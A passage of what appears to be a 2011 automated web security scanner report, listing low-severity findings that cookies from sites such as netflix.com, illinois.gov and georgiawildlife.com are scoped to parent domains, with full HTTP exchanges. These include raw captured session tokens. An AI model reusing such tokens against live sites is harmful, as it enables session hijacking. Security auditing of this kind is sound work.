Cookie: SessionInfo=AffiliateId=0&CampaignId=78228; s_cc=true; s_campaign=78228; s_nr=1304109967309-New; s_ev8=%5B%5B%27mcafee%27%2C%271304109967310%27%5D%5D; s_sq=%5B%5BB%5D%5D; s_vi=[CS]v1|26DD91D7051D181F-60000106600003DE[CE]; CampaignId=86873; ASPSESSIONIDSQTRCCBC=KPLDIJODDCHEAHCOCAPBNDGC; ASPSESSIONIDSCARSBBC=LPHHDJODOEABGOHIPLKDDJDD; CookieInformation=locale=us; lBounceURL=http://home.mcafee.com/secure/cart/?offerId=266730&PkgQty=1; session%5Fdata=%3cSessionData%3e%0d%0a++%3ctempfrlu%3e%3c%2ftempfrlu%3e%0d%0a++%3cwt_source%3eOther%3c%2fwt_source%3e%0d%0a++%3cOrganicSearchtraffic%3e1%3c%2fOrganicSearchtraffic%3e%0d%0a++%3cwt_source_cid%3e86873%3c%2fwt_source_cid%3e%0d%0a++%3cwt_destination_cid%3e86873%3c%2fwt_destination_cid%3e%0d%0a%3c%2fSessionData%3e; SiteID=1; langid=1; lUsrCtxSession=%3cUserContext%3e%3cAffID%3e0%3c%2fAffID%3e%3cAffBuildID%3e0%3c%2fAffBuildID%3e%3c%2fUserContext%3e; Locale=EN-US; HPrst=gu=65a488fe-5ba0-4de1-b3b4-ed8103de2143&loc=EN-US; AffID=0-0; Currency=56; HRntm=aff=0-0&cur=56&cid=86873&ct=1&lbu=http%3a%2f%2fhome.mcafee.com%2fsecure%2fcart%2f%3fofferId%3d266730%26PkgQty%3d1&pfl=UjYffYeSjxhItgwf9DZxCQ%3d%3d&ps=0869fcca3582e1333c8c705fde71a6b35b42445a53040511&pple=iq5nNK%2bISQc78yUmSkAv9A%3d%3d&inur=iq5nNK%2bISQc78yUmSkAv9A%3d%3d&isr=iq5nNK%2bISQc78yUmSkAv9A%3d%3d&sbo=iq5nNK%2bISQc78yUmSkAv9A%3d%3d; IscartemptySiteidAffid=no-1-0

Response

HTTP/1.1 302 Object moved
Date: Fri, 29 Apr 2011 20:58:07 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Location: https://home.mcafee.com/secure/cart/
Content-Length: 157
Content-Type: text/html; Charset=iso-8859-1
Expires: Thu, 28 Apr 2011 20:58:07 GMT
Set-Cookie: AffID=0; domain=.mcafee.com; path=/
Set-Cookie: Locale=en%2Dus; expires=Sun, 29-Apr-2012 07:00:00 GMT; domain=.mcafee.com; path=/
Set-Cookie: langid=1; domain=.mcafee.com; path=/
Set-Cookie: lBounceURL=http%3A%2F%2Fus%2Emcafee%2Ecom%2Froot%2Fbasket%2Easp%3Faffid%3D0%26; domain=.mcafee.com; path=/
Set-Cookie: lUsrCtxSession=%3CUserContext%3E%3CAffID%3E0%3C%2FAffID%3E%3CAffBuildID%3E0%3C%2FAffBuildID%3E%3C%2FUserContext%3E%0D%0A; domain=.mcafee.com; path=/
Set-Cookie: session%5Fdata=%3CSessionData%3E%0D%0A%09%3Ctempfrlu%3E%3C%2Ftempfrlu%3E%0D%0A%09%3Cwt%5Fsource%3EOther%3C%2Fwt%5Fsource%3E%0D%0A%09%3COrganicSearchtraffic%3E1%3C%2FOrganicSearchtraffic%3E%0D%0A%09%3Cwt%5Fsource%5Fcid%3E86873%3C%2Fwt%5Fsource%5Fcid%3E%0D%0A%09%3Cwt%5Fdestination%5Fcid%3E86873%3C%2Fwt%5Fdestination%5Fcid%3E%0D%0A%09%3CBasketflowid%3E0%3C%2FBasketflowid%3E%3C%2FSessionData%3E%0D%0A; domain=.mcafee.com; path=/
Set-Cookie: ASPSESSIONIDCSASRBCD=BCDGAKODDEONHOLIMBKJLOMJ; path=/
Cache-control: private

<head><title>Object moved</title></head>
<body><h1>Object Moved</h1>This object may be found <a HREF="https://home.mcafee.com/secure/cart/">here</a>.</body>

13.29. http://www.coloradochannel.net/  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   http://www.coloradochannel.net
Path:   /

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET / HTTP/1.1
Host: www.coloradochannel.net
Proxy-Connection: keep-alive
Referer: http://www.leg.state.co.us/clics/clics2011a/cslFrontPages.nsf/Audio?OpenForm
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Sat, 30 Apr 2011 11:32:36 GMT
Server: Apache
X-Powered-By: PHP/5.3.2-1ubuntu4.7
Set-Cookie: SESS8c46cefb3d49ee625c6d0242934806ee=2th1ba10a82aj73fmomts36gh3; expires=Mon, 23-May-2011 15:05:56 GMT; path=/; domain=.coloradochannel.net
Last-Modified: Sat, 30 Apr 2011 10:49:32 GMT
ETag: "9aa10e653d6caa1a196ba2f1487f25d6"
Expires: Sun, 19 Nov 1978 05:00:00 GMT
Cache-Control: must-revalidate
Content-Type: text/html; charset=utf-8
Content-Length: 18573

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" dir="ltr">

<head>
<met
...[SNIP]...

13.30. http://www.exploreohio.org/node/11452  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   http://www.exploreohio.org
Path:   /node/11452

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /node/11452 HTTP/1.1
Host: www.exploreohio.org
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sat, 30 Apr 2011 12:32:03 GMT
Server: Apache/2.2.8 (Ubuntu) PHP/5.2.4-2ubuntu5.10 with Suhosin-Patch
X-Powered-By: PHP/5.2.4-2ubuntu5.10
Set-Cookie: SESS06af59565acd35773def796a77a89818=352a4938167485ab218ce098f1c260f3; expires=Mon, 23 May 2011 16:05:23 GMT; path=/; domain=.exploreohio.org
Last-Modified: Sat, 30 Apr 2011 12:29:39 GMT
ETag: "c7afc20a709b6bfbf39bfcbd446a4bde"
Expires: Sun, 19 Nov 1978 05:00:00 GMT
Cache-Control: must-revalidate
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 150735

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en">

<head>
<meta htt
...[SNIP]...

13.31. http://www.georgiawildlife.com/  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   http://www.georgiawildlife.com
Path:   /

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET / HTTP/1.1
Host: www.georgiawildlife.com
Proxy-Connection: keep-alive
Referer: http://www.georgia.gov/external/?url=http://georgiawildlife.dnr.state.ga.us/content/displaynavigation.asp?TopCategory=12
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Sat, 30 Apr 2011 01:01:12 GMT
Server: Apache/2.0.55 (Red Hat)
X-Powered-By: PHP/5.1.2
Set-Cookie: SESSb3425e6a829e62b2674e77ae2f9b9d89=q10cgseom8ongqf0n62a1n7e46; expires=Mon, 23 May 2011 04:34:32 GMT; path=/; domain=.georgiawildlife.com
Last-Modified: Fri, 29 Apr 2011 20:55:56 GMT
ETag: "e18fa6a0947ebfa84a0ffd4cf9198d18"
Expires: Sun, 19 Nov 1978 05:00:00 GMT
Cache-Control: must-revalidate
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 38151

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml"
   xml:lang="en"
   lang="en"
   dir="ltr
...[SNIP]...

13.32. http://www.georgiawildlife.com/boating/registration  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   http://www.georgiawildlife.com
Path:   /boating/registration

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /boating/registration HTTP/1.1
Host: www.georgiawildlife.com
Proxy-Connection: keep-alive
Referer: http://www.georgiawildlife.com/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: SESSb3425e6a829e62b2674e77ae2f9b9d89=8vkabgoe8fgoe50a4tvs8s22u3; has_js=1; __utmz=47653809.1304125303.1.1.utmcsr=georgia.gov|utmccn=(referral)|utmcmd=referral|utmcct=/external/; __utma=47653809.712167714.1304125303.1304125303.1304125303.1; __utmc=47653809; __utmb=47653809.1.10.1304125303

Response

HTTP/1.1 200 OK
Date: Sat, 30 Apr 2011 01:01:23 GMT
Server: Apache/2.0.55 (Red Hat)
X-Powered-By: PHP/5.1.2
Set-Cookie: SESSb3425e6a829e62b2674e77ae2f9b9d89=8vkabgoe8fgoe50a4tvs8s22u3; expires=Mon, 23 May 2011 04:34:44 GMT; path=/; domain=.georgiawildlife.com
Last-Modified: Fri, 29 Apr 2011 20:57:09 GMT
ETag: "bcf616b794e27c89723912a29147f0e7"
Expires: Sun, 19 Nov 1978 05:00:00 GMT
Cache-Control: must-revalidate
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 21570

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml"
   xml:lang="en"
   lang="en"
   dir="ltr
...[SNIP]...

13.33. http://www.georgiawildlife.com/node/1873  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   http://www.georgiawildlife.com
Path:   /node/1873

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /node/1873 HTTP/1.1
Host: www.georgiawildlife.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: has_js=1; SESSb3425e6a829e62b2674e77ae2f9b9d89=ktfftr78kjrcbla6tcejffsmp3; __utmz=47653809.1304163826.2.2.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/14; __utma=47653809.712167714.1304125303.1304125303.1304163826.2; __utmc=47653809; __utmb=47653809.1.10.1304163826;

Response

HTTP/1.1 200 OK
Date: Sat, 30 Apr 2011 12:32:33 GMT
Server: Apache/2.0.55 (Red Hat)
X-Powered-By: PHP/5.1.2
Set-Cookie: SESSb3425e6a829e62b2674e77ae2f9b9d89=ktfftr78kjrcbla6tcejffsmp3; expires=Mon, 23 May 2011 16:05:53 GMT; path=/; domain=.georgiawildlife.com
Last-Modified: Sat, 30 Apr 2011 12:29:48 GMT
ETag: "bce6c0c54c3ee5e6027013b24732f311"
Expires: Sun, 19 Nov 1978 05:00:00 GMT
Cache-Control: must-revalidate
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 18411

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml"
   xml:lang="en"
   lang="en"
   dir="ltr
...[SNIP]...

13.34. http://www.illinois.gov/PressReleases/PressReleasesSearch.cfm  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   http://www.illinois.gov
Path:   /PressReleases/PressReleasesSearch.cfm

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:The cookies appear to contain session tokens, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /PressReleases/PressReleasesSearch.cfm HTTP/1.1
Host: www.illinois.gov
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sat, 30 Apr 2011 12:38:53 GMT
X-Powered-By: ASP.NET
Connection: close
Set-Cookie: CFID=6010680;domain=.illinois.gov;path=/
Set-Cookie: CFTOKEN=22644029;domain=.illinois.gov;path=/
Content-Type: text/html; charset=UTF-8
Server: WebServer


        <HTML>
<HEAD>
<TITLE>Illinois.gov - Illinois Government News Network (IGNN) - Search the News</
...[SNIP]...

13.35. http://www.illinois.gov/PressReleases/ShowPressRelease.cfm  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   http://www.illinois.gov
Path:   /PressReleases/ShowPressRelease.cfm

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:The cookies appear to contain session tokens, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /PressReleases/ShowPressRelease.cfm HTTP/1.1
Host: www.illinois.gov
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sat, 30 Apr 2011 12:38:56 GMT
X-Powered-By: ASP.NET
Connection: close
Set-Cookie: CFID=6010688;domain=.illinois.gov;path=/
Set-Cookie: CFTOKEN=38168705;domain=.illinois.gov;path=/
Content-Type: text/html; charset=UTF-8
Server: WebServer


        <HTML>
<HEAD>
<TITLE>Illinois.gov - Illinois Government News Network (IGNN) - Search the News Res
...[SNIP]...

13.36. http://www.illinois.gov/PressReleases/ShowbyM.cfm  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   http://www.illinois.gov
Path:   /PressReleases/ShowbyM.cfm

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:The cookies appear to contain session tokens, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /PressReleases/ShowbyM.cfm HTTP/1.1
Host: www.illinois.gov
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sat, 30 Apr 2011 12:38:53 GMT
X-Powered-By: ASP.NET
Connection: close
Set-Cookie: CFID=6010682;domain=.illinois.gov;path=/
Set-Cookie: CFTOKEN=41820026;domain=.illinois.gov;path=/
Content-Language: en-US
Content-Type: text/html; charset=UTF-8
Server: WebServer


        <HTML>
<HEAD>
<TITLE>Illinois.gov - Illinois Government News Network (IGNN) - Press Releases by D
...[SNIP]...

13.37. http://www.kodakgallery.com/gallery/lp/2010/visit_florida/vacation_photos.jsp  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   http://www.kodakgallery.com
Path:   /gallery/lp/2010/visit_florida/vacation_photos.jsp

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /gallery/lp/2010/visit_florida/vacation_photos.jsp HTTP/1.1
Host: www.kodakgallery.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Cache-Control: no-cache, no-store
Expires: -1
Set-Cookie: JSESSIONID=D46B50E50B2D7896BD5D3180384FFEF2.ecom302_main; Domain=kodakgallery.com; Path=/
Set-Cookie: sourceId=500019816903; Domain=kodakgallery.com; Expires=Mon, 30-May-2011 12:39:07 GMT; Path=/
Set-Cookie: sourceId=null; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: DYN_EMAIL=anon_mem1216050931@kodakgallery.com; Domain=kodakgallery.com; Path=/
Set-Cookie: bookStartTest1=control; Domain=kodakgallery.com; Expires=Sun, 29-Apr-2012 12:39:07 GMT; Path=/
Set-Cookie: bookUnlockedLayoutTest=lockedLayout; Domain=kodakgallery.com; Expires=Sun, 29-Apr-2012 12:39:07 GMT; Path=/
Set-Cookie: ft_80002=none; Domain=kodakgallery.com; Expires=Sun, 29-Apr-2012 12:39:07 GMT; Path=/
Set-Cookie: abTest=bookStartTest1-bookUnlockedLayoutTest-ft_80002-; Domain=kodakgallery.com; Expires=Sun, 29-Apr-2012 12:39:07 GMT; Path=/
Content-Type: text/html;charset=ISO-8859-1
Date: Sat, 30 Apr 2011 12:39:07 GMT
Server: ecom302
Connection: close
Content-Length: 38122

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
   <meta http-equ
...[SNIP]...

13.38. http://www.netflix.com/  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   http://www.netflix.com
Path:   /

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET / HTTP/1.1
Host: www.netflix.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 302 Moved Temporarily
Date: Sat, 30 Apr 2011 12:39:39 GMT
Server: Apache-Coyote/1.1
P3P: CP="CAO DSP COR DEVa TAIa OUR BUS UNI STA"
Location: http://www.netflix.com/Default?tcw=1&cqs=
Content-Length: 0
Set-Cookie: VisitorId=002~7eabf80e-bdf8-4546-9025-bba2b0852eb1~1304167179465~true~1304167179465~; Domain=.netflix.com; Expires=Sun, 29-Apr-2012 12:39:39 GMT; Path=/
Set-Cookie: nflxsid=217.1304167179465; Domain=.netflix.com; Path=/
Set-Cookie: NetflixSession=217.39c40b20-ccdd-4c3e-8df4-c0e52d7a1451; Domain=.netflix.com; Path=/
Set-Cookie: NetflixCookies=try_persistent; Domain=.netflix.com; Expires=Mon, 30-May-2011 12:39:39 GMT; Path=/
Set-Cookie: asearch=130416717946615217; Domain=.netflix.com; Expires=Sun, 29-Apr-2012 12:39:39 GMT; Path=/
Vary: Accept-Encoding
Cache-Control: private
Keep-Alive: timeout=15, max=100
Connection: Keep-Alive
Content-Type: text/plain
Set-Cookie: NSC_ED2-xxx=ffffffff09cc3e6445525d5f4f58455e445a4a422d69;path=/;domain=netflix.com;httponly


13.39. http://www.netflix.com/NRD/PS3  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   http://www.netflix.com
Path:   /NRD/PS3

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /NRD/PS3 HTTP/1.1
Host: www.netflix.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 302 Moved Temporarily
Date: Sat, 30 Apr 2011 12:39:39 GMT
Server: Apache-Coyote/1.1
P3P: CP="CAO DSP COR DEVa TAIa OUR BUS UNI STA"
Location: http://www.netflix.com/NRD/PS3?tcw=1&cqs=
Content-Length: 0
Set-Cookie: VisitorId=002~c4c3625f-42a6-4f4d-9806-fa85844e7c50~1304167179465~true~1304167179465~; Domain=.netflix.com; Expires=Sun, 29-Apr-2012 12:39:39 GMT; Path=/
Set-Cookie: nflxsid=218.1304167179465; Domain=.netflix.com; Path=/
Set-Cookie: NetflixSession=218.211d7ea3-02f5-4a1c-8153-e9424b65d4b7; Domain=.netflix.com; Path=/
Set-Cookie: NetflixCookies=try_persistent; Domain=.netflix.com; Expires=Mon, 30-May-2011 12:39:39 GMT; Path=/
Set-Cookie: asearch=130416717946644218; Domain=.netflix.com; Expires=Sun, 29-Apr-2012 12:39:39 GMT; Path=/
Vary: Accept-Encoding
Cache-Control: private
Keep-Alive: timeout=15, max=47
Connection: Keep-Alive
Content-Type: text/plain
Set-Cookie: NSC_ED2-xxx=ffffffff09cc3e6745525d5f4f58455e445a4a422d69;path=/;domain=netflix.com;httponly


13.40. http://www.netflix.com/NRD/Wii  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   http://www.netflix.com
Path:   /NRD/Wii

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /NRD/Wii HTTP/1.1
Host: www.netflix.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 302 Moved Temporarily
Date: Sat, 30 Apr 2011 12:39:39 GMT
Server: Apache-Coyote/1.1
P3P: CP="CAO DSP COR DEVa TAIa OUR BUS UNI STA"
Location: http://www.netflix.com/NRD/Wii?tcw=1&cqs=
Content-Length: 0
Set-Cookie: VisitorId=002~f6aea8d5-7e11-4396-87aa-3a3bf97b1bad~1304167179725~true~1304167179725~; Domain=.netflix.com; Expires=Sun, 29-Apr-2012 12:39:39 GMT; Path=/
Set-Cookie: nflxsid=204.1304167179725; Domain=.netflix.com; Path=/
Set-Cookie: NetflixSession=204.60b0c1a1-de44-4927-8f24-ae2eaddcb8ed; Domain=.netflix.com; Path=/
Set-Cookie: NetflixCookies=try_persistent; Domain=.netflix.com; Expires=Mon, 30-May-2011 12:39:39 GMT; Path=/
Set-Cookie: asearch=130416717972639204; Domain=.netflix.com; Expires=Sun, 29-Apr-2012 12:39:39 GMT; Path=/
Vary: Accept-Encoding
Cache-Control: private
Keep-Alive: timeout=15, max=96
Connection: Keep-Alive
Content-Type: text/plain
Set-Cookie: NSC_ED2-xxx=ffffffff09cc3e7945525d5f4f58455e445a4a422d69;path=/;domain=netflix.com;httponly


13.41. http://www.netflix.com/NRD/Xbox  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   http://www.netflix.com
Path:   /NRD/Xbox

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /NRD/Xbox HTTP/1.1
Host: www.netflix.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 302 Moved Temporarily
Date: Sat, 30 Apr 2011 12:39:39 GMT
Server: Apache-Coyote/1.1
P3P: CP="CAO DSP COR DEVa TAIa OUR BUS UNI STA"
Location: http://www.netflix.com/NRD/Xbox?tcw=1&cqs=
Content-Length: 0
Set-Cookie: VisitorId=002~5ce7ec58-66b2-4e6c-92fe-dd1ff9a55459~1304167179999~true~1304167179999~; Domain=.netflix.com; Expires=Sun, 29-Apr-2012 12:39:39 GMT; Path=/
Set-Cookie: nflxsid=228.1304167179999; Domain=.netflix.com; Path=/
Set-Cookie: NetflixSession=228.248e0eb2-56d6-49b8-8ce4-136c86f739a1; Domain=.netflix.com; Path=/
Set-Cookie: NetflixCookies=try_persistent; Domain=.netflix.com; Expires=Mon, 30-May-2011 12:39:39 GMT; Path=/
Set-Cookie: asearch=130416717999968228; Domain=.netflix.com; Expires=Sun, 29-Apr-2012 12:39:39 GMT; Path=/
Vary: Accept-Encoding
Cache-Control: private
Keep-Alive: timeout=15, max=97
Connection: Keep-Alive
Content-Type: text/plain
Set-Cookie: NSC_ED2-xxx=ffffffff09cc3e9145525d5f4f58455e445a4a422d69;path=/;domain=netflix.com;httponly


13.42. http://www.opensource.org/licenses/mit-license.php  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   http://www.opensource.org
Path:   /licenses/mit-license.php

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /licenses/mit-license.php HTTP/1.1
Host: www.opensource.org
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Fri, 29 Apr 2011 21:19:09 GMT
Server: Apache/2.2.17 (FreeBSD) mod_ssl/2.2.17 OpenSSL/0.9.8n DAV/2 SVN/1.6.16
Set-Cookie: SESScfc6ae0fd5872e4ca9e7dfd6aa7abb6f=vg3vmlsoshfa39r3kb5kj5jrq0; expires=Mon, 23-May-2011 00:52:29 GMT; path=/; domain=.opensource.org
Last-Modified: Fri, 29 Apr 2011 21:17:31 GMT
ETag: "4bacb78b273b8f8819eb563a375e8dce"
Expires: Sun, 19 Nov 1978 05:00:00 GMT
Cache-Control: must-revalidate
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 20417

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" dir="ltr">
<head>
<
...[SNIP]...

13.43. http://www.tanfa.co.uk/archives/show.asp  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   http://www.tanfa.co.uk
Path:   /archives/show.asp

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /archives/show.asp HTTP/1.1
Host: www.tanfa.co.uk
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 404 Not Found
Date: Sat, 30 Apr 2011 12:40:35 GMT
Server: Apache/2.2.17 (Unix) mod_ssl/2.2.17 OpenSSL/0.9.8e-fips-rhel5 mod_bwlimited/1.4 mod_fcgid/2.3.6
X-Powered-By: PHP/5.2.17
Expires: Sun, 19 Nov 1978 05:00:00 GMT
Cache-Control: store, no-cache, must-revalidate, post-check=0, pre-check=0
Set-Cookie: SESS489331f7119935ed8b06bb0fd9ed673c=1b73264372517897b1436e85efebe5ad; expires=Mon, 23-May-2011 16:13:55 GMT; path=/; domain=.tanfa.co.uk
Last-Modified: Sat, 30 Apr 2011 12:40:35 GMT
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 2231

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" dir="ltr">
<head>
<
...[SNIP]...

13.44. http://www.vsea.org/  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   http://www.vsea.org
Path:   /

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET / HTTP/1.1
Host: www.vsea.org
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Fri, 29 Apr 2011 22:12:49 GMT
Server: Apache/2.2.9 (Debian) mod_fastcgi/2.4.6 mod_fcgid/2.3.5 mod_python/3.3.1 Python/2.5.2 mod_ssl/2.2.9 OpenSSL/0.9.8g mod_perl/2.0.4 Perl/v5.10.0
X-Powered-By: PHP/5.2.6-1+lenny9
Expires: Sun, 19 Nov 1978 05:00:00 GMT
Cache-Control: store, no-cache, must-revalidate, post-check=0, pre-check=0
Set-Cookie: SESSc2e79101469fa43c6bcc78e0ec8b2f81=a33741c30c60faca76c77b41e704af54; expires=Mon, 23 May 2011 01:46:09 GMT; path=/; domain=.vsea.org
Last-Modified: Fri, 29 Apr 2011 22:12:49 GMT
Vary: User-Agent,Accept-Encoding
Content-Type: text/html; charset=utf-8
Content-Length: 45383

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en">

   <head>
   <title>Ver
...[SNIP]...

13.45. http://a.triggit.com/px  previous  next

Summary

Severity:   Information
